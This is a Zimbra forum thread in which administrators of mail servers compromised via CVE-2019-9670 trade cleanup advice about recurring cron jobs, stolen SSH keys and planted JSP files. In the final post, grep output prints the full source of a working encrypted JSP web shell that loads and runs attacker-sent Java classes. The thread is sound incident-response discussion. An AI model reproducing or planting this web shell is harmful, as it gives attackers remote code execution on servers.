CVE-2019-9670 being actively exploited

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
Stemond11
Posts: 4
Joined: Mon May 27, 2019 7:51 pm

Re: CVE-2019-9670 being actively exploited

Postby Stemond11 » Mon May 27, 2019 8:00 pm

Hi ng

My zimbra machine is compromised.
If i delete zmswatch script and zmswatch crontab after few hours the script returns .
How can i find the source malaware ?
How can i delete definitly the script?

Please help me. !!
Thanks Stefano


tin
Posts: 11
Joined: Wed Jan 17, 2018 2:32 am

Re: CVE-2019-9670 being actively exploited

Postby tin » Tue May 28, 2019 1:04 am

Have a read over the whole thread.... I'll give a few thoughts here, but this is not everything...

You've most likely got a cron job re-downloading the malicious script. There may also be malicious js files scattered through the jetty/webapps folders.

I found uninstalling wget and curl stopped the scripts working to reinfect. This may give you a better chance to clean things up, but they may also use other tricks.

Start planning how you can migrate to a clean install on a clean OS. Do not assume you have cleaned it all out.

Disable SSH access from outside the local network if you are working on the same network the server is located on. Some of the attacks appear to have sent the zimvra SSH keys to the attacker, allowing them SSH access until you can regenerate those keys.
User avatar
maxxer
Advanced member
Advanced member
Posts: 143
Joined: Fri Oct 04, 2013 2:12 am
Contact:

Re: CVE-2019-9670 being actively exploited

Postby maxxer » Tue May 28, 2019 5:31 am

Stemond11 wrote:Hi ng
How can i find the source malaware ?
How can i delete definitly the script?


read the whole thread and/or the blogpost linked here, you will find guidelines on how to cleanup your system
Stemond11
Posts: 4
Joined: Mon May 27, 2019 7:51 pm

Re: CVE-2019-9670 being actively exploited

Postby Stemond11 » Tue May 28, 2019 7:35 am

in previsious post it's posted ZMCAT solutions
I have zmswatch on crontab and after i delete/kill it , it's come back!

In /tmp all request JSP like this every 30 seconds are in read-only:
WHY ??

<Configure class="org.eclipse.jetty.webapp.WebAppContext">
<Get name="securityHandler">
<Set name="loginService">
<New class="com.zimbra.cs.servlet.ZimbraLoginService">
<Set name="name">Zimbra</Set>
</New>
</Set>
<Set name="authenticatorFactory">
<New class="com.zimbra.cs.servlet.ZimbraAuthenticatorFactory">
<Set name="urlPattern">//downloads/*</Set>
</New>
</Set>
</Get>
</Configure>
User avatar
maxxer
Advanced member
Advanced member
Posts: 143
Joined: Fri Oct 04, 2013 2:12 am
Contact:

Re: CVE-2019-9670 being actively exploited

Postby maxxer » Tue May 28, 2019 7:35 am

Stemond11 wrote:in previsious post it's posted ZMCAT solutions
I have zmswatch on crontab and after i delete/kill it , it's come back!

it's the same infection, just more widely spread on the system. cleanup steps are basically the same. first of all patch your system, then cleanup all the mess: cron, unwanted jsp and so on
Stemond11
Posts: 4
Joined: Mon May 27, 2019 7:51 pm

Re: CVE-2019-9670 being actively exploited

Postby Stemond11 » Tue May 28, 2019 7:42 am

i have just delete Crontab
Where do i find unwanted jsp ?
here ? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp

thank you
Stefano
elby
Posts: 14
Joined: Tue May 28, 2019 7:37 am
Contact:

Re: CVE-2019-9670 being actively exploited

Postby elby » Tue May 28, 2019 8:00 am

maxxer wrote:
Stemond11 wrote:in previsious post it's posted ZMCAT solutions
I have zmswatch on crontab and after i delete/kill it , it's come back!

it's the same infection, just more widely spread on the system. cleanup steps are basically the same. first of all patch your system, then cleanup all the mess: cron, unwanted jsp and so on


After:
===


What should I clean up?
how to figure out what are the unwanted jsp files?

Thanks,
AB_Zimbra
Posts: 4
Joined: Sat May 25, 2019 12:52 pm

Re: CVE-2019-9670 being actively exploited

Postby AB_Zimbra » Tue May 28, 2019 8:14 am

Stemond11 wrote:i have just delete Crontab
Where do i find unwanted jsp ?
here ? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp

thank you
Stefano


The infection creates new jsp's and edits existing ones with "control code". This way the attacker can remotely execute commands on your comprimised system. Patching after infection is not enough, you need to find all those "backdoors" and remove them or replace them with the ones from the source (install packages).

Please read the blog on maxxer it's site, as he linked to at the start of this topic.

This might be hard if you're not an experienced sysadmin. Maybe this will help you to find those files:

Code: Select all

grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd
zimbraxtc
Posts: 7
Joined: Mon May 27, 2019 6:13 pm

Re: CVE-2019-9670 being actively exploited

Postby zimbraxtc » Tue May 28, 2019 8:18 am

Hello all!

I have the same issue on a 8.6 Ubuntu.

- added patch
- clean /var/spool/cron/crontabs/zimbra (line at the end)
- clean /opt/zimbra/log/zmswatch and zmswatch.sh
- removed added email-accounts (only one)
- changed the admin-pass for zimbra-user
- cant find any strange .jsp-files.
- clean /opt/zimbra/data/tmp/.zmswatch.xxx files

zmswatch still popping up...

after cleaning like above zmswatch started without zimbra-server running.

Any ideas or thoughts about this?
mqaroush
Posts: 38
Joined: Sun Aug 03, 2014 4:31 am

Re: CVE-2019-9670 being actively exploited

Postby mqaroush » Tue May 28, 2019 9:05 am

[root@xxxx ]# grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp.ORG:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/work/zimbra/org/apache/jsp/public_/Offline_jsp.java: out.print(request.getParameter("retryOnError"));

What this mean???

Return to “Administrators”

Who is online

Users browsing this forum: No registered users and 14 guests